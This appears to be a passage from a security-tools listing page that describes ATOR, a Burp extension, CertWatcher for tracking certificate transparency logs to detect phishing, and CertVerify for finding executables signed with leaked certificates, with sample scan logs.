    Contributing

    Please read CONTRIBUTING.md for details on our code of conduct, and the process for submitting pull requests to us.

    Versioning

    v1.0

    Authors

    Authors from Synopsys - Ashwath Reddy (@ka3hk) and Manikandan Rajappan (@rmanikdn)

    License

    This software is released by Synopsys under the MIT license.

    Acknowledgments

    • https://github.com/FrUh/ExtendedMacro ExtendedMacro was a great start - we have modified the UI to handle more complex scenarios. We have also fixed bugs and improved speed by replacing tokens in memory.

    Demo Video

    ATOR v2.0.0:

    UI Panel was splitted into 4 different configuration. Check out the code from v2 or use the executable from v2/bin.

    1. Error Condition - Find the error condition req/res and add trigger condition [Can be statuscode/text in body content/text in header]. Multiple condition can also be added.
    2. Obtain Token: Find all the req/res to get the token. It can be single or multiple request (do replacement accordingly)
    3. Error Condition Replacement: Mark the trigger condition and also mark the place on request where replacement needs to taken (map the extraction)
    4. Preview: Dry run it before configure for scan.


    CertWatcher - A Tool For Capture And Tracking Certificate Transparency Logs, Using YAML Templates Based DSL


    CertWatcher is a tool for capture and tracking certificate transparency logs, using YAML templates. The tool helps to detect and analyze phishing websites and regular expression patterns, and is designed to make it easy to use for security professionals and researchers.



    Certwatcher continuously monitors the certificate data stream and checks for suspicious patterns or malicious activity. Certwatcher can also be customized to detect specific phishing patterns and combat the spread of malicious websites.

    Get Started

    Certwatcher allows you to use custom templates to display the certificate information. We have some public custom templates available from the community. You can find them in our repository.

    Useful Links

    Contribution

    If you want to contribute to this project, follow the steps below:

    • Fork this repository.
    • Create a new branch with your feature: git checkout -b my-new-feature
    • Make changes and commit the changes: git commit -m 'Adding a new feature'
    • Push to the original branch: git push origin my-new-feature
    • Open a pull request.

    Authors



    CertVerify - A Scanner That Files With Compromised Or Untrusted Code Signing Certificates


    The CertVerify is a tool designed to detect executable files (exe, dll, sys) that have been signed with untrusted or leaked code signing certificates. The purpose of this tool is to identify potentially malicious files that have been signed using certificates that have been compromised, stolen, or are not from a trusted source.

    Why is this tool needed?

    Executable files signed with compromised or untrusted code signing certificates can be used to distribute malware and other malicious software. Attackers can use these files to bypass security controls and to make their malware appear legitimate to victims. This tool helps to identify these files so that they can be removed or investigated further.

    As a continuous project of the previous malware scanner, i have created such a tool. This type of tool is also essential in the event of a security incident response.

    Scope of use and limitations

    1. The CertVerify cannot guarantee that all files identified as suspicious are necessarily malicious. It is possible for files to be falsely identified as suspicious, or for malicious files to go undetected by the scanner.

    2. The scanner only targets code signing certificates that have been identified as malicious by the public community. This includes certificates extracted by malware analysis tools and services, and other public sources. There are many unverified malware signing certificates, and it is not possible to obtain the entire malware signing certificate the tool can only detect some of them. For additional detection, you have to extract the certificate's serial number and fingerprint information yourself and add it to the signatures.

    3. The scope of this tool does not include the extraction of code signing information for special rootkits that have already preempted and operated under the kernel, such as FileLess bootkits, or hidden files hidden by high-end technology. In other words, if you run this tool, it will be executed at the user level. Similar functions at the kernel level are more accurate with antirootkit or EDR. Please keep this in mind and focus on the ideas and principles... To implement the principle that is appropriate for the purpose of this tool, you need to development a driver(sys) and run it into the kernel with NT\SYSTEM privileges.

    4. Nevertheless, if you want to run this tool in the event of a Windows system intrusion incident, and your purpose is sys files, boot into safe mode or another boot option that does not load the extra driver(sys) files (load only default system drivers) of the Windows system before running the tool. I think this can be a little more helpful.

    5. Alternatively, mount the Windows system disk to the Linux and run the tool in the Linux environment. I think this could yield better results.

    Features

    • File inspection based on leaked or untrusted certificate lists.
    • Scanning includes subdirectories.
    • Ability to define directories to exclude from scanning.
    • Supports multiprocessing for faster job execution.
    • Whitelisting based on certificate subject (e.g., Microsoft subject certificates are exempt from detection).
    • Option to skip inspection of unsigned files for faster scans.
    • Easy integration with SIEM systems such as Splunk by attaching scan_logs.
    • Easy-to-handle and customizable code and function structure.

    And...

    • Please let me know if any changes are required or if additional features are needed.
    • If you find this helpful, please consider giving it a "star"
      ๏ŒŸ
      to support further improvements.

    v1.0.0

    Scan result_log

    datetime="2023-03-06 20:17:57",scan_id="87ea3e7b-dedc-4016-a43e-5c83f8d27c6e",os_version="Windows",hostname="DESKTOP-S5VJGLH",ip_address="192.168.0.23",infected_file="F:\code\pythonProject\certverify\test\chrome.exe",signature_hash="sha256",serial_number="0e4418e2dede36dd2974c3443afb5ce5",thumbprint="7d3d117664f121e592ef897973ef9c159150e3d736326e9cd2755f71e0febc0c",subject_name="Google LLC",issu   er_name="DigiCert Trusted G4 Code Signing RSA4096 SHA384 2021 CA1",file_created_at="2023-03-03 23:20:41",file_modified_at="2022-04-14 06:17:04"
    datetime="2023-03-06 20:17:58",scan_id="87ea3e7b-dedc-4016-a43e-5c83f8d27c6e",os_version="Windows",hostname="DESKTOP-S5VJGLH",ip_address="192.168.0.23",infected_file="F:\code\pythonProject\certverify\test\LineLauncher.exe",signature_hash="sha256",serial_number="0d424ae0be3a88ff604021ce1400f0dd",thumbprint="b3109006bc0ad98307915729e04403415c83e3292b614f26964c8d3571ecf5a9",subject_name="DigiCert Timestamp 2021",issuer_name="DigiCert SHA2 Assured ID Timestamping CA",file_created_at="2023-03-03 23:20:42",file_modified_at="2022-03-10 18:00:10"
    datetime="2023-03-06 20:17:58",scan_id="87ea3e7b-dedc-4016-a43e-5c83f8d27c6e",os_version="Windows",hostname="DESKTOP-S5VJGLH",ip_address="192.168.0.23",infected_file="F:\code\pythonProject\certverify\test\LineUpdater.exe",signature_hash="sha256",serial_number="0d424ae0be3a88ff604021ce1400f0dd",thumb print="b3109006bc0ad98307915729e04403415c83e3292b614f26964c8d3571ecf5a9",subject_name="DigiCert Timestamp 2021",issuer_name="DigiCert SHA2 Assured ID Timestamping CA",file_created_at="2023-03-03 23:20:42",file_modified_at="2022-04-06 10:06:28"
    datetime="2023-03-06 20:17:59",scan_id="87ea3e7b-dedc-4016-a43e-5c83f8d27c6e",os_version="Windows",hostname="DESKTOP-S5VJGLH",ip_address="192.168.0.23",infected_file="F:\code\pythonProject\certverify\test\TWOD_Launcher.exe",signature_hash="sha256",serial_number="073637b724547cd847acfd28662a5e5b",thumbprint="281734d4592d1291d27190709cb510b07e22c405d5e0d6119b70e73589f98acf",subject_name="DigiCert Trusted G4 RSA4096 SHA256 TimeStamping CA",issuer_name="DigiCert Trusted Root G4",file_created_at="2023-03-03 23:20:42",file_modified_at="2022-04-07 09:14:08"
    datetime="2023-03-06 20:18:00",scan_id="87ea3e7b-dedc-4016-a43e-5c83f8d27c6e",os_version="Windows",hostname="DESKTOP-S5VJGLH",ip_address="192.168.0.23",infected_file="F:\code\pythonProject \certverify\test\VBoxSup.sys",signature_hash="sha256",serial_number="2f451139512f34c8c528b90bca471f767b83c836",thumbprint="3aa166713331d894f240f0931955f123873659053c172c4b22facd5335a81346",subject_name="VirtualBox for Legacy Windows Only Timestamp Kludge 2014",issuer_name="VirtualBox for Legacy Windows Only Timestamp CA",file_created_at="2023-03-03 23:20:43",file_modified_at="2022-10-11 08:11:56"
    datetime="2023-03-06 20:31:59",scan_id="f71277c5-ed4a-4243-8070-7e0e56b0e656",os_version="Windows",hostname="DESKTOP-S5VJGLH",ip_address="192.168.0.23",infected_file="F:\code\pythonProject\certverify\test\chrome.exe",signature_hash="sha256",serial_number="0e4418e2dede36dd2974c3443afb5ce5",thumbprint="7d3d117664f121e592ef897973ef9c159150e3d736326e9cd2755f71e0febc0c",subject_name="Google LLC",issuer_name="DigiCert Trusted G4 Code Signing RSA4096 SHA384 2021 CA1",file_created_at="2023-03-03 23:20:41",file_modified_at="2022-04-14 06:17:04"
    datetime="2023-03-06 20:32:00",scan_id="f71277c 5-ed4a-4243-8070-7e0e56b0e656",os_version="Windows",hostname="DESKTOP-S5VJGLH",ip_address="192.168.0.23",infected_file="F:\code\pythonProject\certverify\test\LineLauncher.exe",signature_hash="sha256",serial_number="0d424ae0be3a88ff604021ce1400f0dd",thumbprint="b3109006bc0ad98307915729e04403415c83e3292b614f26964c8d3571ecf5a9",subject_name="DigiCert Timestamp 2021",issuer_name="DigiCert SHA2 Assured ID Timestamping CA",file_created_at="2023-03-03 23:20:42",file_modified_at="2022-03-10 18:00:10"
    datetime="2023-03-06 20:32:00",scan_id="f71277c5-ed4a-4243-8070-7e0e56b0e656",os_version="Windows",hostname="DESKTOP-S5VJGLH",ip_address="192.168.0.23",infected_file="F:\code\pythonProject\certverify\test\LineUpdater.exe",signature_hash="sha256",serial_number="0d424ae0be3a88ff604021ce1400f0dd",thumbprint="b3109006bc0ad98307915729e04403415c83e3292b614f26964c8d3571ecf5a9",subject_name="DigiCert Timestamp 2021",issuer_name="DigiCert SHA2 Assured ID Timestamping CA",file_created_at="2023-03-03 23:20:42",file_modified_at="2022-04-06 10:06:28"
    datetime="2023-03-06 20:32:01",scan_id="f71277c5-ed4a-4243-8070-7e0e56b0e656",os_version="Windows",hostname="DESKTOP-S5VJGLH",ip_address="192.168.0.23",infected_file="F:\code\pythonProject\certverify\test\TWOD_Launcher.exe",signature_hash="sha256",serial_number="073637b724547cd847acfd28662a5e5b",thumbprint="281734d4592d1291d27190709cb510b07e22c405d5e0d6119b70e73589f98acf",subject_name="DigiCert Trusted G4 RSA4096 SHA256 TimeStamping CA",issuer_name="DigiCert Trusted Root G4",file_created_at="2023-03-03 23:20:42",file_modified_at="2022-04-07 09:14:08"
    datetime="2023-03-06 20:32:02",scan_id="f71277c5-ed4a-4243-8070-7e0e56b0e656",os_version="Windows",hostname="DESKTOP-S5VJGLH",ip_address="192.168.0.23",infected_file="F:\code\pythonProject\certverify\test\VBoxSup.sys",signature_hash="sha256",serial_number="2f451139512f34c8c528b90bca471f767b83c836",thumbprint="3aa166713331d894f240f0931955f123873659053c172c4b22facd5335a81346",subjec t_name="VirtualBox for Legacy Windows Only Timestamp Kludge 2014",issuer_name="VirtualBox for Legacy Windows Only Timestamp CA",file_created_at="2023-03-03 23:20:43",file_modified_at="2022-10-11 08:11:56"
    datetime="2023-03-06 20:33:45",scan_id="033976ae-46cb-4c2e-a357-734353f7e09a",os_version="Windows",hostname="DESKTOP-S5VJGLH",ip_address="192.168.0.23",infected_file="F:\code\pythonProject\certverify\test\chrome.exe",signature_hash="sha256",serial_number="0e4418e2dede36dd2974c3443afb5ce5",thumbprint="7d3d117664f121e592ef897973ef9c159150e3d736326e9cd2755f71e0febc0c",subject_name="Google LLC",issuer_name="DigiCert Trusted G4 Code Signing RSA4096 SHA384 2021 CA1",file_created_at="2023-03-03 23:20:41",file_modified_at="2022-04-14 06:17:04"
    datetime="2023-03-06 20:33:45",scan_id="033976ae-46cb-4c2e-a357-734353f7e09a",os_version="Windows",hostname="DESKTOP-S5VJGLH",ip_address="192.168.0.23",infected_file="F:\code\pythonProject\certverify\test\LineLauncher.exe",signature_hash="sha 256",serial_number="0d424ae0be3a88ff604021ce1400f0dd",thumbprint="b3109006bc0ad98307915729e04403415c83e3292b614f26964c8d3571ecf5a9",subject_name="DigiCert Timestamp 2021",issuer_name="DigiCert SHA2 Assured ID Timestamping CA",file_created_at="2023-03-03 23:20:42",file_modified_at="2022-03-10 18:00:10"
    datetime="2023-03-06 20:33:45",scan_id="033976ae-46cb-4c2e-a357-734353f7e09a",os_version="Windows",hostname="DESKTOP-S5VJGLH",ip_address="192.168.0.23",infected_file="F:\code\pythonProject\certverify\test\LineUpdater.exe",signature_hash="sha256",serial_number="0d424ae0be3a88ff604021ce1400f0dd",thumbprint="b3109006bc0ad98307915729e04403415c83e3292b614f26964c8d3571ecf5a9",subject_name="DigiCert Timestamp 2021",issuer_name="DigiCert SHA2 Assured ID Timestamping CA",file_created_at="2023-03-03 23:20:42",file_modified_at="2022-04-06 10:06:28"
    datetime="2023-03-06 20:33:46",scan_id="033976ae-46cb-4c2e-a357-734353f7e09a",os_version="Windows",hostname="DESKTOP-S5VJGLH",ip_address="192. 168.0.23",infected_file="F:\code\pythonProject\certverify\test\TWOD_Launcher.exe",signature_hash="sha256",serial_number="073637b724547cd847acfd28662a5e5b",thumbprint="281734d4592d1291d27190709cb510b07e22c405d5e0d6119b70e73589f98acf",subject_name="DigiCert Trusted G4 RSA4096 SHA256 TimeStamping CA",issuer_name="DigiCert Trusted Root G4",file_created_at="2023-03-03 23:20:42",file_modified_at="2022-04-07 09:14:08"
    datetime="2023-03-06 20:33:47",scan_id="033976ae-46cb-4c2e-a357-734353f7e09a",os_version="Windows",hostname="DESKTOP-S5VJGLH",ip_address="192.168.0.23",infected_file="F:\code\pythonProject\certverify\test\VBoxSup.sys",signature_hash="sha256",serial_number="2f451139512f34c8c528b90bca471f767b83c836",thumbprint="3aa166713331d894f240f0931955f123873659053c172c4b22facd5335a81346",subject_name="VirtualBox for Legacy Windows Only Timestamp Kludge 2014",issuer_name="VirtualBox for Legacy Windows Only Timestamp CA",file_created_at="2023-03-03 23:20:43",file_modified_at="2022-10-11 08:11:56"


    โŒ